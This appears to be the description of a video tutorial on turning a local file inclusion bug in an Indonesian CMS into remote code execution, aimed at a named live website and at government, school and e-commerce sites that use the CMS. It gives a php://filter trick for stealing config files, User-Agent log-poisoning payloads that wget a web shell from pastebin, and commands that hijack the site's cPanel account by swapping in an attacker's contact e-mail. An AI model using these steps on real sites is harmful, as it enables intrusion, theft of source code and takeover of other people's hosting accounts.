Hi all! in this video I will share about LFI to RCE on WEB Image CMS where this CMS has been used enough on websites in Indonesia such as government, E-commerce, school and others. You can see a list of websites that use this CMS at once to become vuln website for LFI to RCE link: https://citra.web.id/en/project.html okay I already have one of the targets Target: https://www.eureka.co.id/ here I will practice some techniques for utilizing LFI bugs besides for RCE, that is, we can steal Source Code like Config and others so please don't skipp this video unless you are a master wkwk [+] LFI exploits: / system / ajax /? file [+] Get file config with LFI php: //filter/convert.base64-encode/resource=file [+] Exploit RCE: Step 1. Mozilla / 5.0 (Windows NT 6.1; rv: 27.0) Gecko / 20100101 Firefox / 27.0 <? = System ('wget https://pastebin.com/raw/yYJVNJqp -O x.php; ls -la')?> // make sure the x.php file already exists step 2. Mozilla / 5.0 (Windows NT 6.1; rv: 27.0) Gecko / 20100101 Firefox / 27.0 <? = System ('mv .htaccess .htacces')?> // now we access the file x.php // yups succeeded // I will try to enter the code // next we will get Get cpanel access [+] Get Cpanel with RCE: enter command # wget https://pastebin.com/raw/HcwPV8hd -O.contactemail # mv. contactemail ../ # mv ../.cpanel/contactinfo ../.cpanel/contactinfo2 // admeur07 this is the username for cpanel // https://pastebin.com/raw/HcwPV8hd > the contents are e-mail to receive the code